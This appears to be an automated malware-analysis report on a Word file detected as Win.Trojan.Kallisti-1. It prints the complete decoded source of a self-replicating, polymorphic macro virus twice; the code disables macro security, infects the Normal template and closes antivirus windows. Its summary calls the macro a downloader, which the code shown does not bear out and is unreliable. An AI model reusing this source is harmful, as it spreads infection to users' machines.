Win.Trojan.Kallisti-1 Office (OLE) malware analysis — malicious · 0f0b789deebfd1a3

MALICIOUS

Office (OLE)

37.5 KB Created: 2001-03-18 12:14:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 00e89c72491119d38f3b6435c3739a57 SHA-1: e20395afcb4de8c561823160dcdb8fb077e7e6e6 SHA-256: 0f0b789deebfd1a3769ed9fa88b88d6db830ba6713b3fc75e94edaaf3cfe3f78

200 Risk Score

Malware Insights

Win.Trojan.Kallisti-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The script attempts to lower macro security settings by modifying registry keys, specifically 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM'. The macro also appears to deobfuscate and execute further code, suggesting it acts as a downloader for a secondary payload.

Heuristics 5

ClamAV: Win.Trojan.Kallisti-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Kallisti-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4783 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4783 bytes
SHA-256: `892b3212133d66a220c7bceaadc69eee3abf66cf24f58b3621d4848400cf7abd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next µÊ“©ˆ = µÊ“©ˆ + 1 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& WordBasic.FileExit dlg End If If VBA.GetAttr(Word.Application.ActiveDocument.FullName) = µÊ“©ˆ Then VBA.SetAttr Word.Application.ActiveDocument.FullName, (Rnd * 0) ActiveDocument.Reload End If VBA.SetAttr Word.Application.NormalTemplate.FullName, (Rnd * 0) Options.SaveNormalPrompt = vbEmpty Set Ë³‚¬ˆ = VBA.IIf(Word.Application.MacroContainer = Word.Application.ActiveDocument, Word.Application.NormalTemplate, Word.Application.ActiveDocument) With Ë³‚¬ˆ.VBProject With .vbcomponents.Item(µÊ“©ˆ).Codemodule If Not .lines(90, µÊ“©ˆ) Like "'XP" Then .deletelines µÊ“©ˆ, .countoflines .insertlines µÊ“©ˆ, ©¬–—»(Word.MacroContainer.VBProject.vbcomponents.Item(µÊ“©ˆ).Codemodule.lines(µÊ“©ˆ, 92)) If Ë³‚¬ˆ = Word.Application.ActiveDocument Then Word.Application.ActiveDocument.SaveAs Word.Application.ActiveDocument.FullName, wdFormatDocument End If End With End With For �—ÈÊŸ = µÊ“©ˆ To Word.Tasks.Count If VBA.InStr(µÊ“©ˆ, VBA.LCase(Word.Tasks(�—ÈÊŸ).Name), "vir") Then Word.Tasks(�—ÈÊŸ).Close Next If VBA.InStr(µÊ“©ˆ, VBA.Time, "5") Then ˆ¼–„— = "Merlin" Set •��±Ÿ = CreateObject("Agent.Control.1") •��±Ÿ.Connected = True If VBA.IsObject(•��±Ÿ) Then •��±Ÿ.Characters.Load ˆ¼–„—, ˆ¼–„— & ".acs" Set Ÿ¶™°� = •��±Ÿ.Characters(ˆ¼–„—) With Ÿ¶™°� .Top = 100 .Left = 100 .LanguageID = &H409 .Show End With Ÿ¶™°�.Play "Greet" Ÿ¶™°�.Speak "Hello, " & Word.Application.UserName & "!" & "\Vol=99" Ÿ¶™°�.Play "GetAttention" Ÿ¶™°�.Play "GetAttentionReturn" Ÿ¶™°�.Speak "I said: 'Hello " & Word.Application.UserName & "!" & Chr(39) Ÿ¶™°�.Play "Idle2_2" Ÿ¶™°�.Speak "Let me tell you something about a confused girl..." Ÿ¶™°�.Play "Idle1_1" Ÿ¶™°�.Speak "...once she turned around and thought," Ÿ¶™°�.Play "Idle1_2" Ÿ¶™°�.Speak "how damn simple it is," Ÿ¶™°�.Play "Idle1_1" Ÿ¶™°�.Speak "leaving a man she once loved," Ÿ¶™°�.Play "Idle2_1" Ÿ¶™°�.Speak "but she did not notice," Ÿ¶™°�.Play "Idle1_1" Ÿ¶™°�.Speak "that her heart had become deaf by the pain..." Ÿ¶™°�.Play "Acknowledge" Ÿ¶™°�.Play "Idle1_1" Ÿ¶™°�.Speak "Oh, I forgot..." Ÿ¶™°�.Play "Idle2_1" Ÿ¶™°�.Speak "I think you are infected with XP.Kallisti...(the first virus for Office XP ever)" Ÿ¶™°�.Play "Idle1_1" Ÿ¶™°�.Speak "Damn... I have to go now..." Ÿ¶™°�.MoveTo 800, 600 Ÿ¶™°�.Play "Idle3_1" Ÿ¶™°�.Play "Wave" Ÿ¶™°�.Speak "Goodbye now " & Word.Application.UserName & "!" Set Ž¬‡£Ä = Ÿ¶™°�.Hide Do Until Ž¬‡£Ä.Status = 0 VBA.DoEvents Loop •��±Ÿ.Characters.Unload ˆ¼–„— End If End If End Sub Private Function ©¬–—»(‚º¾¶„) 'Oh my god, it's poly...xD µÊ“©ˆ = µÊ“©ˆ + 1 Á¼�É = "©¬–—» ‚º¾¶„ Á¼�É Â…Èœ¨ º…¤— ¯±”•¿ ¾ÊÅ’ µÊ“©ˆ Ë³‚¬ˆ ˆ¼–„— �—ÈÊŸ •��±Ÿ Ÿ¶™°� Ž¬‡£Ä " Do ¾ÊÅ’ = VBA.Left( Á¼�É, VBA.InStr( Á¼�É, VBA.Chr(32)) - µÊ“©ˆ): Á¼�É = VBA.Mid( Á¼�É, VBA.InStr( Á¼�É, VBA.Chr(32)) + µÊ“©ˆ) º…¤— = VBA.Chr((VBA.Int(VBA.Rnd 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) Do ¯±”•¿ = VBA.InStr(¯±”•¿ + µÊ“©ˆ, VBA.LCase(‚º¾¶„), VBA.LCase(¾ÊÅ’)) If ¯±”•¿ Then ‚º¾¶„ = VBA.Mid(‚º¾¶„, µÊ“©ˆ, (¯±”•¿ - µÊ“©ˆ)) & º…¤— & VBA.Mid(‚º¾¶„, (¯±”•¿ + VBA.Len(¾ÊÅ’))) Loop While ¯±”•¿ Loop While Á¼�É <> "" ©¬–—» = ‚º¾¶„ End Function 'XP.Kallisti '(c) 2001 jackie // linezer0

SHA-256: 892b3212133d66a220c7bceaadc69eee3abf66cf24f58b3621d4848400cf7abd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
µÊ“©ˆ = µÊ“©ˆ + 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
WordBasic.FileExit dlg
End If
If VBA.GetAttr(Word.Application.ActiveDocument.FullName) = µÊ“©ˆ Then
VBA.SetAttr Word.Application.ActiveDocument.FullName, (Rnd * 0)
ActiveDocument.Reload
End If
VBA.SetAttr Word.Application.NormalTemplate.FullName, (Rnd * 0)
Options.SaveNormalPrompt = vbEmpty
Set Ë³‚¬ˆ = VBA.IIf(Word.Application.MacroContainer = Word.Application.ActiveDocument, Word.Application.NormalTemplate, Word.Application.ActiveDocument)
With Ë³‚¬ˆ.VBProject
With .vbcomponents.Item(µÊ“©ˆ).Codemodule
If Not .lines(90, µÊ“©ˆ) Like "'XP*" Then
.deletelines µÊ“©ˆ, .countoflines
.insertlines µÊ“©ˆ, ©¬–—»(Word.MacroContainer.VBProject.vbcomponents.Item(µÊ“©ˆ).Codemodule.lines(µÊ“©ˆ, 92))
If Ë³‚¬ˆ = Word.Application.ActiveDocument Then Word.Application.ActiveDocument.SaveAs Word.Application.ActiveDocument.FullName, wdFormatDocument
End If
End With
End With
For �—ÈÊŸ = µÊ“©ˆ To Word.Tasks.Count
If VBA.InStr(µÊ“©ˆ, VBA.LCase(Word.Tasks(�—ÈÊŸ).Name), "vir") Then Word.Tasks(�—ÈÊŸ).Close
Next
If VBA.InStr(µÊ“©ˆ, VBA.Time, "5") Then
ˆ¼–„— = "Merlin"
Set •��±Ÿ = CreateObject("Agent.Control.1")
•��±Ÿ.Connected = True
If VBA.IsObject(•��±Ÿ) Then
•��±Ÿ.Characters.Load ˆ¼–„—, ˆ¼–„— & ".acs"
Set Ÿ¶™°� = •��±Ÿ.Characters(ˆ¼–„—)
With Ÿ¶™°�
.Top = 100
.Left = 100
.LanguageID = &H409
.Show
End With
Ÿ¶™°�.Play "Greet"
Ÿ¶™°�.Speak "Hello, " & Word.Application.UserName & "!" & "\Vol=99"
Ÿ¶™°�.Play "GetAttention"
Ÿ¶™°�.Play "GetAttentionReturn"
Ÿ¶™°�.Speak "I said: 'Hello " & Word.Application.UserName & "!" & Chr(39)
Ÿ¶™°�.Play "Idle2_2"
Ÿ¶™°�.Speak "Let me tell you something about a confused girl..."
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "...once she turned around and thought,"
Ÿ¶™°�.Play "Idle1_2"
Ÿ¶™°�.Speak "how damn simple it is,"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "leaving a man she once loved,"
Ÿ¶™°�.Play "Idle2_1"
Ÿ¶™°�.Speak "but she did not notice,"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "that her heart had become deaf by the pain..."
Ÿ¶™°�.Play "Acknowledge"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "Oh, I forgot..."
Ÿ¶™°�.Play "Idle2_1"
Ÿ¶™°�.Speak "I think you are infected with XP.Kallisti...(the first virus for Office XP ever)"
Ÿ¶™°�.Play "Idle1_1"
Ÿ¶™°�.Speak "Damn... I have to go now..."
Ÿ¶™°�.MoveTo 800, 600
Ÿ¶™°�.Play "Idle3_1"
Ÿ¶™°�.Play "Wave"
Ÿ¶™°�.Speak "Goodbye now " & Word.Application.UserName & "!"
Set Ž¬‡£Ä = Ÿ¶™°�.Hide
Do Until Ž¬‡£Ä.Status = 0
VBA.DoEvents
Loop
•��±Ÿ.Characters.Unload ˆ¼–„—
End If
End If
End Sub
Private Function ©¬–—»(‚º¾¶„) 'Oh my god, it's poly...xD
µÊ“©ˆ = µÊ“©ˆ + 1
 Á¼�É = "©¬–—» ‚º¾¶„  Á¼�É Â…Èœ¨ º…¤— ¯±”•¿ ¾ÊÅ’ µÊ“©ˆ Ë³‚¬ˆ ˆ¼–„— �—ÈÊŸ •��±Ÿ Ÿ¶™°� Ž¬‡£Ä "
Do
¾ÊÅ’ = VBA.Left( Á¼�É, VBA.InStr( Á¼�É, VBA.Chr(32)) - µÊ“©ˆ):  Á¼�É = VBA.Mid( Á¼�É, VBA.InStr( Á¼�É, VBA.Chr(32)) + µÊ“©ˆ)
º…¤— = VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129)) & VBA.Chr((VBA.Int(VBA.Rnd * 75) + 129))
Do
¯±”•¿ = VBA.InStr(¯±”•¿ + µÊ“©ˆ, VBA.LCase(‚º¾¶„), VBA.LCase(¾ÊÅ’))
If ¯±”•¿ Then ‚º¾¶„ = VBA.Mid(‚º¾¶„, µÊ“©ˆ, (¯±”•¿ - µÊ“©ˆ)) & º…¤— & VBA.Mid(‚º¾¶„, (¯±”•¿ + VBA.Len(¾ÊÅ’)))
Loop While ¯±”•¿
Loop While  Á¼�É <> ""
©¬–—» = ‚º¾¶„
End Function
'XP.Kallisti
'(c) 2001 jackie // linezer0

Open this report in the interactive analyzer, or submit your own file for analysis.